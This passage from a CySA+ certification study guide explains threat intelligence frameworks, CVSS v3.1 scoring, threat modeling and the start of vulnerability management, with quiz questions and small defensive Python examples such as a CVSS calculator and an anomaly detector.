does one of the following things:
• Educates and warns you about potential dangers
not yet seen in the environment
• Identifies behavior that accompanies malicious
activity
• Alerts you of ongoing malicious activity
However, possessing threat intelligence is of no use if it
is not converted into concrete activity that responds to
and mitigates issues. This chapter discusses how to
utilize threat intelligence to support organizational
security.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these four self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 2-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 2-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a knowledge base of
adversary tactics and techniques based on real-world observations?
a. Diamond Model
b. OWASP
c. MITRE ATT&CK
d. STIX
2. Which of the following threat intelligence data
types is generated from past activities?
a. Reputational
b. Behavioral
c. Heuristics
d. Anticipatory
3. Your team has identified that a recent breach was
sourced by a disgruntled employee. What part of
threat modeling is being performed by such
identification?
a. Total attack surface
b. Impact
c. Adversary capability
d. Attack vector
4. Which of the following functions uses shared threat
intelligence data to build in security for new
products and solutions?
a. Incident response
b. Security engineering
c. Vulnerability management
d. Risk management
FOUNDATION TOPICS
ATTACK FRAMEWORKS
Many organizations have developed security
management frameworks and methodologies to help
guide security professionals. These attack
frameworks and methodologies include security
program development standards, enterprise and security
architecture development frameworks, security control
development methods, corporate governance methods,
and process management methods. The following
sections discuss major frameworks and methodologies
and explain where they are used.
MITRE ATT&CK
MITRE ATT&CK is a knowledge base of adversary
tactics and techniques based on real-world observations.
It is an open system, and attack matrices based on it
have been created for various industries. It is designed as
a foundation for the development of specific threat
models and methodologies in the private sector, in
government, and in the cybersecurity product and
service community.
An example of such a matrix is the SaaS Matrix created
for organizations utilizing Software as a Service (SaaS),
shown in Table 2-2. The corresponding matrix on the
MITRE ATT&CK website is interactive
(https://attack.mitre.org/matrices/enterprise/cloud/saas/), and when you click the name of an attack technique
in a cell, a new page opens with a detailed explanation of
that attack technique. For more information about the
MITRE ATT&CK Matrix for Enterprise and to view the
matrices it provides for other platforms (Windows,
macOS, etc.), see
https://attack.mitre.org/matrices/enterprise/.
Table 2-2 ATT&CK Matrix for SaaS
The Diamond Model of Intrusion
Analysis
The Diamond Model of Intrusion Analysis
emphasizes the relationships and characteristics of four
basic components: the adversary, capabilities,
infrastructure, and victims. The main axiom of this
model states, “For every intrusion event there exists an
adversary taking a step towards an intended goal by
using a capability over infrastructure against a victim to
produce a result.”
Figure 2-1 shows a depiction of the Diamond Model.
Figure 2-1 Diamond Model
The corners of the Diamond Model are defined as
follows:
• Adversary: The intent of the attack
• Capability: Attacker intrusion tools and
techniques
• Infrastructure: The set of systems an attacker
uses to launch attacks
• Victim: A single victim or multiple victims
To access the Diamond Model document, see https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf.
Kill Chain
The cyber kill chain is a cyber intrusion identification
and prevention model developed by Lockheed Martin
that describes the stages of an intrusion. It includes
seven steps, as described in Figure 2-2. For more
information, see https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html.
Figure 2-2 Kill Chain
THREAT RESEARCH
As a security professional, sometimes just keeping up
with your day-to-day workload can be exhausting. But
performing ongoing research as part of your regular
duties is more important in today’s world than ever
before. You should work with your organization and
direct supervisor to ensure that you either obtain formal
security training on a regular basis or are given adequate
time to maintain and increase your security knowledge.
You should research the current best security practices,
any new security technologies that are coming to market,
any new security systems and services that have
launched, and how security technology has evolved
recently.
Threat intelligence is a process that is used to inform
decisions regarding responses to any menace or hazard
presented by the latest attack vectors and actors
emerging on the security horizon. Threat intelligence
analyzes evidence-based knowledge, including context,
mechanisms, indicators, implications, and actionable
advice, about an existing or emerging menace or hazard
to assets.
Performing threat intelligence requires generating a
certain amount of raw material for the process. This
information includes data on the latest attacks,
knowledge of current vulnerabilities and threats,
specifications on the latest zero-day mitigation controls
and remediation techniques, and descriptions of the
latest threat models. Let’s look at some issues important
to threat research.
Reputational
Some threat intelligence data is generated from past
activities. Reputational scores may be generated for
traffic sourced from certain IP ranges, domain names,
and URLs. An example of a system that uses such
reputational scores is the Cisco Talos IP and Domain
Reputation Center. Customers who are participants in
the system enjoy access to data from all customers.
As malicious traffic is received by customers,
reputational scores are developed for IP ranges, domain
names, and URLs that serve as sources of the traffic.
Based on these scores, traffic may be blocked from those
sources on the customer networks.
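A minimal sketch of how reputational blocking might work appears below; the feed, scores, and threshold are hypothetical, and real platforms such as Cisco Talos expose their own scales and APIs.

```python
# Hypothetical reputation feed: lower scores indicate worse reputation.
# The values and threshold here are illustrative only.
REPUTATION = {
    "203.0.113.7": 12,      # repeatedly reported as a malicious source
    "198.51.100.20": 85,    # generally trustworthy
}

BLOCK_THRESHOLD = 40

def should_block(source_ip: str) -> bool:
    """Block traffic from sources whose reputation falls below the threshold.
    Unknown sources are allowed but could be queued for further analysis."""
    score = REPUTATION.get(source_ip)
    return score is not None and score < BLOCK_THRESHOLD

for ip in ("203.0.113.7", "198.51.100.20", "192.0.2.1"):
    print(ip, "-> block" if should_block(ip) else "-> allow")
```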
Behavioral
Some threat intelligence data is based not on reputation
but on the behavior of the traffic in question. For
example, when the source in question is repeatedly
sending large amounts of traffic to a single IP address, it
indicates a potential DoS attack.
Behavioral analysis is also known as anomaly analysis,
because it also observes network behaviors for
anomalies. It can be implemented using combinations of
the scanning types, including NetFlow, protocol, and
packet analyses, to create a baseline and subsequently
report departures from the traffic metrics found in the
baseline. One of the newer advances in this field is the
development of user and entity behavior analytics
(UEBA). This type of analysis focuses on user activities.
Combining behavior analysis with machine learning,
UEBA enhances the ability to determine which particular
users are behaving oddly. An example would be a hacker
who has stolen credentials of a user and is identified by
the system because he is not performing the same
activities that the user would perform.
Heuristics is a method used in malware detection,
behavioral analysis, incident detection, and other
scenarios in which patterns must be detected in the
midst of what might appear to be chaos. It is a process
that ranks alternatives using search algorithms, and
although it is not an exact science and is somewhat a
form of “guessing,” it has been shown in many cases to
approximate an exact solution. Heuristics also includes a
process of self-learning through trial and error as it
arrives at the final approximated solution. Many IPS, IDS, and anti-malware systems that include heuristics capabilities can often detect so-called zero-day issues using this technique.
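The following sketch illustrates the baseline-and-departure idea with a simple z-score test over hypothetical per-host traffic volumes; production tools build far richer baselines (NetFlow, protocol, and packet analysis) than this single measure.

```python
from statistics import mean, stdev

# Baseline of bytes-per-minute sent by one host (hypothetical sample data).
baseline = [1200, 1350, 1100, 1280, 1330, 1190, 1250, 1310]
mu, sigma = mean(baseline), stdev(baseline)

def is_anomalous(observed: float, threshold: float = 3.0) -> bool:
    """Flag traffic that departs from the baseline by more than
    `threshold` standard deviations (a simple z-score test)."""
    return abs(observed - mu) / sigma > threshold

# A sudden burst of outbound traffic stands out against the baseline,
# much as a potential DoS source or data exfiltration would.
for sample in (1290, 9800):
    print(sample, "anomalous" if is_anomalous(sample) else "normal")
```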
Indicator of Compromise (IoC)
An indicator of compromise (IoC) is any activity,
artifact, or log entry that is typically associated with an
attack of some sort. Typical examples include the
following:
• Virus signatures
• Known malicious file types
• Domain names of known botnet servers
Known IoCs are exchanged within the security industry,
using the Traffic Light Protocol (TLP) to classify the
IoCs. TLP is a set of designations used to ensure that
sensitive information is shared with the appropriate
audience. Somewhat analogous to a traffic light, it
employs four colors to indicate expected sharing
boundaries to be applied by the recipient.
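The sketch below models the four TLP designations and a sharing decision for a hypothetical IoC record. Note that the color names follow TLP version 1.0; TLP 2.0 renames WHITE to CLEAR.

```python
# The four TLP designations and the sharing boundary each one implies.
# The IoC record below is a hypothetical example.
TLP_BOUNDARY = {
    "RED":   "named recipients only",
    "AMBER": "recipient organization, on a need-to-know basis",
    "GREEN": "peers and partner organizations in the community",
    "WHITE": "no restriction on disclosure",
}

ioc = {
    "value": "evil.example.com",
    "type": "domain-name",
    "tlp": "AMBER",
}

def may_share_with_community(record: dict) -> bool:
    """Only GREEN- and WHITE-marked IoCs may leave the organization's
    trusted circle for broad community sharing."""
    return record["tlp"] in ("GREEN", "WHITE")

print(TLP_BOUNDARY[ioc["tlp"]])
print("share with community:", may_share_with_community(ioc))
```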
Common Vulnerability Scoring
System (CVSS)
The Common Vulnerability Scoring System (CVSS) version 3.1 is a system for ranking discovered vulnerabilities based on predefined metrics. This system ensures that the most critical vulnerabilities can be easily identified and addressed after a vulnerability assessment is completed. Most commercial vulnerability management tools use CVSS scores as a baseline. Scores are awarded on a scale of 0 to 10, with the values having the following ranks:
• 0: No issues
• 0.1 to 3.9: Low
• 4.0 to 6.9: Medium
• 7.0 to 8.9: High
• 9.0 to 10.0: Critical
Note
The Forum of Incident Response and Security Teams (FIRST) is the custodian of CVSS 3.1.
CVSS is composed of three metric groups:
• Base: Characteristics of a vulnerability that are
constant over time and user environments
• Temporal: Characteristics of a vulnerability that
change over time but not among user
environments
• Environmental: Characteristics of a
vulnerability that are relevant and unique to a
particular user’s environment
The Base metric group includes the following metrics:
• Attack Vector (AV): Describes how the attacker
would exploit the vulnerability and has four
possible values:
• L: Stands for Local and means that the attacker
must have physical or logical access to the
affected system
• A: Stands for Adjacent network and means that
the attacker must be on the local network
• N: Stands for Network and means that the
attacker can cause the vulnerability from any
network
• P: Stands for Physical and requires the attacker
to physically touch or manipulate the
vulnerable component
• Attack Complexity (AC): Describes the difficulty of exploiting the vulnerability and has two possible values:
• H: Stands for High and means that the
vulnerability requires special conditions that
are hard to find
• L: Stands for Low and means that the
vulnerability does not require special
conditions
• Privileges Required (PR): Describes the
authentication an attacker would need to get
through to exploit the vulnerability and has three
possible values:
• H: Stands for High and means the attacker
requires privileges that provide significant
(e.g., administrative) control over the
vulnerable component allowing access to
component-wide settings and files
• L: Stands for Low and means the attacker
requires privileges that provide basic user
capabilities that could normally affect only
settings and files owned by a user
• N: Stands for None and means that no
authentication mechanisms are in place to stop
the exploit of the vulnerability
• User Interaction (UI): Captures the
requirement for a human user, other than the
attacker, to participate in the successful
compromise of the vulnerable component.
• N: Stands for None and means the vulnerable
system can be exploited without interaction
from any user
• R: Stands for Required and means successful
exploitation of this vulnerability requires a user
to take some action before the vulnerability can
be exploited
• Scope (S): Captures whether a vulnerability in
one vulnerable component impacts resources in
components beyond its security scope.
• U: Stands for Unchanged and means the
exploited vulnerability can only affect
resources managed by the same security
authority
• C: Stands for Changed and means that the
exploited vulnerability can affect resources
beyond the security scope managed by the
security authority of the vulnerable component
The Impact metrics, which are part of the Base metric group, include the following:
• Availability (A): Describes the disruption that
might occur if the vulnerability is exploited and
has three possible values:
• N: Stands for None and means that there is no
availability impact
• L: Stands for Low and means that system
performance is degraded
• H: Stands for High and means that the system
is completely shut down
• Confidentiality (C): Describes the information
disclosure that may occur if the vulnerability is
exploited and has three possible values:
• N: Stands for None and means that there is no
confidentiality impact
• L: Stands for Low and means some access to
information would occur
• H: Stands for High and means all information
on the system could be compromised
• Integrity (I): Describes the type of data
alteration that might occur and has three possible
values:
• N: Stands for None and means that there is no
integrity impact
• L: Stands for Low and means some
information modification would occur
• H: Stands for High and means all information
on the system could be compromised
A CVSS v3.1 vector looks something like this:
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
This vector is read as follows:
• AV:L: Attack Vector, where L stands for Local and means that the attacker must have physical or logical access to the affected system
• AC:H: Attack Complexity, where H stands for High and means that the vulnerability requires special conditions that are hard to find
• PR:L: Privileges Required, where L stands for Low and means the attacker requires privileges that provide basic user capabilities that could normally affect only settings and files owned by a user
• UI:R: User Interaction, where R stands for
required and means successful exploitation of this
vulnerability requires a user to take some action
before the vulnerability can be exploited
• S:U: Scope, where U stands for Unchanged and
means the exploited vulnerability can only affect
resources managed by the same security authority
• C:L: Confidentiality, where L stands for Low and
means that some access to information would
occur
• I:N: Integrity, where N stands for None and
means that there is no integrity impact
• A:N: Availability, where N stands for None and
means that there is no availability impact
For more information, see https://www.first.org/cvss/v3-1/cvss-v31-specification_r1.pdf.
Note
For access to CVSS calculators, see the following resources:
• CVSS Scoring System Calculator: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?calculator&adv&version=2
• CVSS Version 3.1 Calculator: https://www.first.org/cvss/calculator/3.1
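To make the scoring concrete, the following minimal Python sketch implements the CVSS v3.1 base score equation using the metric weights published in the FIRST specification. The vector-parsing helper is simplified and handles base metrics only; it assumes a well-formed "CVSS:3.1/..." string such as the example vector above.

```python
import math

# Metric weights from the CVSS v3.1 specification (base metrics only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {  # Privileges Required weights depend on Scope
        "U": {"N": 0.85, "L": 0.62, "H": 0.27},
        "C": {"N": 0.85, "L": 0.68, "H": 0.5},
    },
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}

def roundup(x: float) -> float:
    """CVSS v3.1 Roundup(): ceiling to one decimal place, with a guard
    against floating-point representation errors (per the spec pseudocode)."""
    i = round(x * 100000)
    return i / 100000.0 if i % 10000 == 0 else (math.floor(i / 10000) + 1) / 10.0

def base_score(vector: str) -> float:
    # Split "CVSS:3.1/AV:L/AC:H/..." into a metric-to-value mapping.
    m = dict(part.split(":") for part in vector.split("/")[1:])
    scope_changed = m["S"] == "C"
    iss = 1 - (1 - WEIGHTS["CIA"][m["C"]]) * (1 - WEIGHTS["CIA"][m["I"]]) * \
              (1 - WEIGHTS["CIA"][m["A"]])
    impact = (7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
              if scope_changed else 6.42 * iss)
    exploitability = (8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]]
                      * WEIGHTS["PR"][m["S"]][m["PR"]] * WEIGHTS["UI"][m["UI"]])
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total if scope_changed else total, 10))

# The example vector from this section scores 2.2, which falls in the Low rank.
print(base_score("CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N"))
```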
THREAT MODELING
METHODOLOGIES
An organization should have a well-defined risk
management process in place that includes the
evaluation of risk that is present. When this process is
carried out properly, a threat modeling
methodology allows organizations to identify threats
and potential attacks and implement the appropriate
mitigations against these threats and attacks. This process ensures that the security controls that are implemented are in balance with the operations of the organization.
There are a number of factors to consider in a threat modeling methodology; these factors are covered in the following sections.
Adversary Capability
First, you must have a grasp of the capabilities of the
attacker. Threat actors have widely varying capabilities.
When carrying out threat modeling, you may decide to
develop a more comprehensive list of threat actors to
help in scenario development.
Security professionals should analyze all the threats to
identify all the actors who pose significant threats to the
organization. Examples of the threat actors include both
internal and external actors and include the following:
• Internal actors:
• Reckless employee
• Untrained employee
• Partner
• Disgruntled employee
• Internal spy
• Government spy
• Vendor
• Thief
• External actors:
• Anarchist
• Competitor
• Corrupt government official
• Data miner
• Government cyber warrior
• Irrational individual
• Legal adversary
• Mobster
• Activist
• Terrorist
• Vandal
These actors can be subdivided into two categories: non-hostile and hostile. In the preceding lists, three actors are usually considered non-hostile: reckless employee, untrained employee, and partner. All the other actors should be considered hostile.
The organization would then need to analyze each of
these threat actors according to set criteria. All threat
actors should be given a ranking to help determine which
threat actors need to be analyzed. Examples of some of
the most commonly used criteria include the following:
• Skill level: None, minimal, operational, adept
• Resources: Individual, team, organization,
government
• Limits: Code of conduct, legal, extra-legal
(minor), extra-legal (major)
• Visibility: Overt, covert, clandestine, don’t care
• Objective: Copy, destroy, injure, take, don’t care
• Outcome: Acquisition/theft, business advantage,
damage, embarrassment, technical advantage
With these criteria, the organization must then
determine which of the actors it wants to analyze. For
example, the organization may choose to analyze all
hostile actors that have a skill level of adept, resources of
an organization or government, and limits of extra-legal
(minor) or extra-legal (major). Then the list is
consolidated to include only the threat actors that fit all
of these criteria.
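To make the consolidation step concrete, the following sketch filters a hypothetical actor list against the example criteria just described (hostile actors with a skill level of adept, organization- or government-level resources, and extra-legal limits). The actor records and attribute values are illustrative samples drawn from the criteria listed above.

```python
# Hypothetical actor records graded against the ranking criteria above.
actors = [
    {"name": "Government cyber warrior", "hostile": True, "skill": "adept",
     "resources": "government", "limits": "extra-legal (major)"},
    {"name": "Mobster", "hostile": True, "skill": "adept",
     "resources": "organization", "limits": "extra-legal (major)"},
    {"name": "Untrained employee", "hostile": False, "skill": "none",
     "resources": "individual", "limits": "legal"},
    {"name": "Vandal", "hostile": True, "skill": "minimal",
     "resources": "individual", "limits": "extra-legal (minor)"},
]

# The criteria the organization chose to analyze.
criteria = {
    "skill": {"adept"},
    "resources": {"organization", "government"},
    "limits": {"extra-legal (minor)", "extra-legal (major)"},
}

# Keep only hostile actors that satisfy every selected criterion.
shortlist = [
    a["name"] for a in actors
    if a["hostile"] and all(a[field] in allowed
                            for field, allowed in criteria.items())
]
print(shortlist)  # ['Government cyber warrior', 'Mobster']
```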
Total Attack Surface
The total attack surface comprises all the points at
which vulnerabilities exist. It is critical that the
organization have a clear understanding of the total
attack surface. Otherwise, it is somewhat like locking all
the doors of which one is aware while several doors exist
of which one is not aware. The result is unlocked doors.
Identifying the attack surface should be a formalized
process that arrives at a complete list of vulnerabilities.
Only then can each vulnerability be addressed properly
with security controls, processes, and procedures.
To identify the potential attacks that could occur, an
organization must create scenarios so that each potential
attack can be fully analyzed. For example, an
organization may decide to analyze a situation in which a
hacktivist group performs prolonged denial-of-service
attacks, causing sustained outages intended to damage
the organization’s reputation. The organization then
must make a risk determination for each scenario.
Once all the scenarios are determined, the organization
develops an attack tree for each potential attack. Such an
attack tree includes all the steps and/or conditions that
must occur for the attack to be successful. The
organization then maps security controls to the attack
trees.
To determine the security controls that can be used, the
organization would need to look at industry standards,
including NIST SP 800-53 (revision 4 at the time of
writing). Finally, the organization would map controls
back into the attack tree to ensure that controls are
implemented at as many levels of the attack surface as
possible.
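As a simple illustration of mapping controls to an attack tree, the following Python sketch (with hypothetical attack steps and controls) represents a tree as nested dictionaries and flags any step that has no control mapped to it:

attack_tree = {
    "goal": "exfiltrate customer data",
    "steps": [
        {"step": "phish credentials", "control": "user awareness training"},
        {"step": "escalate privileges", "control": "least-privilege ACLs"},
        {"step": "exfiltrate over DNS", "control": None},  # no control mapped yet
    ],
}

# Walk the tree and report coverage gaps so controls can be added.
for node in attack_tree["steps"]:
    status = node["control"] or "GAP - no control mapped"
    print(f'{node["step"]}: {status}')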
Note
For more information on NIST SP 800-53, see https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf.
Attack Vector
An attack vector is the path or means with which the
attack is carried out. Some examples of attack vectors
include the following:
• Phishing
• Malware
• Exploitation of unpatched vulnerabilities
• Code injection
• Social engineering
• Advanced persistent threats (APTs)
Once attack vectors and attack agents have been
identified, the organization must assess the relative
impact and likelihood of such attacks. This allows the
organization to prioritize the limited resources available
to address the vulnerabilities.
Impact
Once all assets have been identified and their value to the
organization has been established, the organization must
identify the impact to each asset, that is, the harm to the organization should that asset be compromised. While both quantitative and qualitative risk
assessments may be performed, when a qualitative
assessment is conducted, the risks are placed into the
following categories:
• High
• Medium
• Low
Typically, a risk assessment matrix is created, such as the
one shown in Figure 2-3. Subject matter experts grade all
risks on their likelihood and their impact. This helps to
prioritize the application of resources to the most critical
vulnerabilities.
Figure 2-3 Risk Assessment Matrix
Once the organization determines what it really cares
about protecting, the organization should then select the
scenarios that could have a catastrophic impact on the
organization by using the objective and outcome values
from the adversary capability analysis and the asset value
and business impact information from the impact
analysis.
Probability
When performing the assessment mentioned in the
previous section, the organization must also consider the
probability that each security event occurs; note in
Figure 2-3 that one axis of the risk matrix is impact and
the other is probability.
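A qualitative matrix like the one in Figure 2-3 can be thought of as a simple lookup keyed by probability and impact. The following Python sketch shows the idea; the ratings are illustrative, not taken from the figure:

# Risk rating indexed by (probability, impact); values are illustrative.
RISK_MATRIX = {
    ("low", "low"): "Low",        ("low", "medium"): "Low",      ("low", "high"): "Medium",
    ("medium", "low"): "Low",     ("medium", "medium"): "Medium", ("medium", "high"): "High",
    ("high", "low"): "Medium",    ("high", "medium"): "High",    ("high", "high"): "High",
}

def rate_risk(probability, impact):
    return RISK_MATRIX[(probability, impact)]

print(rate_risk("high", "medium"))  # 'High'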
THREAT INTELLIGENCE
SHARING WITH SUPPORTED
FUNCTIONS
Earlier we looked at the importance of sharing
intelligence information with other organizations. It is
also critical that such information be shared with all
departments that perform various security functions.
Although an organization might not have a separate
group for each of the areas covered in the sections that
follow, security professionals should ensure that the
latest threat data is made available to all functional units
that participate in these activities.
Incident Response
Incident response will be covered more completely in
Chapter 15, “The Incident Response Process,” but here it
is important to point out that properly responding to
security incidents requires knowledge of what may be
occurring, and that requires a knowledge of the very
latest threats and how those threats are realized.
Therefore, members who are trained in the incident
response process should also be kept up to date on the
latest threat vectors by giving them access to all threat
intelligence that has been collected through any
sharing arrangements.
Vulnerability Management
Vulnerability management will be covered in
Chapter 5, “Threats and Vulnerabilities Associated with Specialized
Technology,” and Chapter 6, “Threats and Vulnerabilities
Associated with Operating in the Cloud,” but here it is
important to point out that there is no function that
depends so heavily on shared intelligence information as
vulnerability management. When sharing platforms and
protocols are used to identify new threats, this data must
be shared in a timely manner with those managing
vulnerabilities.
Risk Management
Risk management will be addressed in Chapter 20,
“Applying Security Concepts in Support of
Organizational Risk Mitigation.” It is a formal process
that rates identified vulnerabilities by the likelihood of
their compromise and the impact of said compromise.
Because this process is based on complete and thorough
vulnerability identification, speedy sharing of any new
threat intelligence is critical to the vulnerability
management process on which risk management
depends.
Security Engineering
Security engineering is the process of architecting
security features into the design of a system or set of
systems. It has as its goal an emphasis on security from
the ground up, sometimes stated as “building in
security.” Unless the very latest threats are shared with
this function, engineers cannot be expected to build in
features that prevent threats from being realized.
Detection and Monitoring
Finally, those who are responsible for monitoring and
detecting attacks also benefit greatly from timely sharing
of threat intelligence data. Without this, indicators of
compromise cannot be developed and utilized to identify
the new threats in time to stop them from causing
breaches.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 2-3 lists a reference of these key topics and the
page number on which each is found.
Table 2-3 Key Topics in Chapter 2
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
attack frameworks
MITRE ATT&CK
Diamond Model of Intrusion Analysis
adversary
capability
infrastructure
victim
kill chain
heuristics
indicator of compromise (IoC)
Common Vulnerability Scoring System (CVSS)
Attack Vector (AV)
Attack Complexity (AC)
Privileges Required (Pr)
Availability (A)
Confidentiality (C)
Integrity (I)
risk management
threat modeling methodology
total attack surface
incident response
threat intelligence
vulnerability management
security engineering
REVIEW QUESTIONS
1. Match each corner of the Diamond Model with its
description.
2. The _______________ corner of the Diamond
Model focuses on the intent of the attack.
3. What type of threat data describes a source that
repeatedly sends large amounts of traffic to a single
IP address?
4. _________________ is any activity, artifact, or
log entry that is typically associated with an attack
of some sort.
5. Give at least two examples of an IoC.
6. Match each acronym with its description
7. In the following CVSS vector, what does the Pr:L
designate?
CVSS2#AV:L/AC:H/Pr:L/UI:R/S:U/C:P/I:N/A:N
8. The _________________CVSS metric group
describes characteristics of a vulnerability that are
constant over time and user environments.
9. The ____________ CVSS base metric describes
how the attacker would exploit the vulnerability.
10. Match each CVSS attack vector value with its
description.
Chapter 3. Vulnerability
Management Activities
This chapter covers the following topics related
to Objective 1.3 (Given a scenario, perform
vulnerability management activities) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification exam:
• Vulnerability identification: Explores asset
criticality, active vs. passive scanning, and
mapping/enumeration
• Validation: Covers true positive, false positive,
true negative, and false negative alerts
• Remediation/mitigation: Describes
configuration baseline, patching, hardening,
compensating controls, risk acceptance, and
verification of mitigation
• Scanning parameters and criteria: Explains
risks associated with scanning activities,
vulnerability feed, scope, credentialed vs. non-credentialed scans, server-based vs. agent-based
scans, internal vs. external scans, and special
considerations including types of data, technical
constraints, workflow, sensitivity levels,
regulatory requirements, segmentation, intrusion
prevention system (IPS), intrusion detection
system (IDS), and firewall settings
• Inhibitors to remediation: Covers
memorandum of understanding (MOU), service-level agreement (SLA), organizational governance,
business process interruption, degrading
functionality, legacy systems, and proprietary
systems
Managing vulnerabilities requires more than a casual
approach. There are certain processes and activities that
should occur to ensure that your management of
vulnerabilities is as robust as it can be. This chapter
describes the activities that should be performed to
manage vulnerabilities.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these five self-assessment
questions, you might want to move ahead to the “Exam
Preparation Tasks” section. Table 3-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 3-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following helps to identify the number
and type of resources that should be devoted to a
security issue?
a. Specific threats that are applicable to the
component
b. Mitigation strategies that could be used
c. The relative value of the information that could
be discovered
d. The organizational culture
2. Which of the following occurs when the scanner
correctly identifies a vulnerability?
a. True positive
b. False positive
c. False negative
d. True negative
3. Which of the following is the first step of the patch
management process?
a. Determine the priority of the patches
b. Install the patches
c. Test the patches
d. Ensure that the patches work properly
4. Which of the following is not a risk associated with
scanning activities?
a. False sense of security can be introduced
b. Does not itself reduce your risk
c. Only as valid as the latest scanner update
d. Distracts from day-to-day operations
5. Which of the following is a document that, while
not legally binding, indicates a general agreement
between the principals to do something together?
a. SLA
b. MOU
c. ICA
d. SCA
FOUNDATION TOPICS
VULNERABILITY
IDENTIFICATION
Vulnerabilities must be identified before they can be
mitigated by applying security controls or
countermeasures. Vulnerability identification is typically
done through a formal process called a vulnerability
assessment, which works hand in hand with another
process called risk management. The vulnerability
assessment identifies and assesses the vulnerabilities,
and the risk management process goes a step further and
identifies the assets at risk and assigns a risk value
(derived from both the impact and likelihood) to each
asset.
Regardless of the components under study (network,
application, database, etc.), any vulnerability
assessment’s goal is to highlight issues before someone
either purposefully or inadvertently leverages the issue
to compromise the component. The design of the
assessment process has a great impact on its success.
Before an assessment process is developed, the following
goals of the assessment need to be identified:
• The relative value of the information that
could be discovered through the
compromise of the components under
assessment: This helps to identify the number
and type of resources that should be devoted to
the issue.
• The specific threats that are applicable to
the component: For example, a web application
would not be exposed to the same issues as a
firewall because their operation and positions in
the network differ.
• The mitigation strategies that could be
deployed to address issues that might be
found: Identifying common strategies can
suggest issues that weren’t anticipated initially.
For example, if you were doing a vulnerability test
of your standard network operating system image,
you should anticipate issues you might find and
identify what technique you will use to address
each.
A security analyst who will be performing a vulnerability
assessment needs to understand the systems and devices
that are on the network and the jobs they perform.
Having this knowledge will ensure that the analyst can
assess the vulnerabilities of the systems and devices
based on the known and potential threats to the systems
and devices.
After gaining knowledge regarding the systems and devices, a security analyst should examine existing
controls in place and identify any threats against those
controls. The security analyst then uses all the
information gathered to determine which automated
tools to use to analyze for vulnerabilities. After the
vulnerability analysis is complete, the security analyst
should verify the results to ensure that they are accurate
and then report the findings to management, with
suggestions for remedial action. With this information in
hand, the security analyst should carry out threat modeling
to identify the threats that could negatively affect
systems and devices and the attack methods that could
be used.
In some situations, a vulnerability management system
may be indicated. A vulnerability management system is
software that centralizes and, to a certain extent,
automates the process of continually monitoring and
testing the network for vulnerabilities. Such a system can
scan the network for vulnerabilities, report them, and, in
many cases, remediate the problem without human
intervention. While a vulnerability management system
is a valuable tool to have, these systems, regardless of
how sophisticated they may be, cannot take the place of
vulnerability and penetration testing performed by
trained professionals.
Keep in mind that after a vulnerability assessment is
complete, its findings are only a snapshot in time. Even if
no vulnerabilities are found, the best statement to
describe the situation is “there are no known
vulnerabilities at this time.” It is impossible to say with
certainty that a vulnerability will not be discovered in the
near future.
Asset Criticality
Assets should be classified based on their value to the
organization and their sensitivity to disclosure. Assigning
a value to data and assets enables an organization to
determine the resources that should be used to protect
them. Resources that are used to protect data include
personnel resources, monetary resources, access control
resources, and so on. Classifying assets enables you to
apply different protective measures. Asset classification
is critical to all systems to protect the confidentiality,
integrity, and availability (CIA) of the asset. After assets
are classified, they can be segmented based on the level
of protection needed. The classification levels ensure that
assets are protected in the most cost-effective manner
possible. The assets could then be configured to ensure
they are isolated or protected based on these
classification levels. An organization should determine
the classification levels it uses based on the needs of the
organization. A number of private-sector classifications
and military and government information classifications
are commonly used.
The information life cycle should also be based on the
classification of the assets. In the case of data assets,
organizations are required to retain certain information,
particularly financial data, based on local, state, or
government laws and regulations.
Sensitivity is a measure of how freely data can be
handled. Data sensitivity is one factor in determining
asset criticality. For example, a particular server that stores highly sensitive data needs to be identified as a high-criticality asset. Some data requires
special care and handling, especially when inappropriate
handling could result in penalties, identity theft,
financial loss, invasion of privacy, or unauthorized access
by an individual or many individuals. Some data is also
subject to regulation by state or federal laws that require
notification in the event of a disclosure. Data is assigned
a level of sensitivity based on who should have access to
it and how much harm would be done if it were
disclosed. This assignment of sensitivity is called data
classification. Criticality is a measure of the importance
of the data. Data that is considered sensitive might not
necessarily be considered critical. Assigning a level of
criticality to a particular data set requires considering the
answers to a few questions:
• Will you be able to recover the data in case of
disaster?
• How long will it take to recover the data?
• What is the effect of this downtime, including loss
of public standing?
Data is considered essential when it is critical to the
organization’s business. When essential data is not
available, even for a brief period of time, or when its
integrity is questionable, the organization is unable to
function. Data is considered required when it is
important to the organization but organizational
operations would continue for a predetermined period of
time even if the data were not available. Data is
nonessential if the organization can operate without it
during extended periods of time.
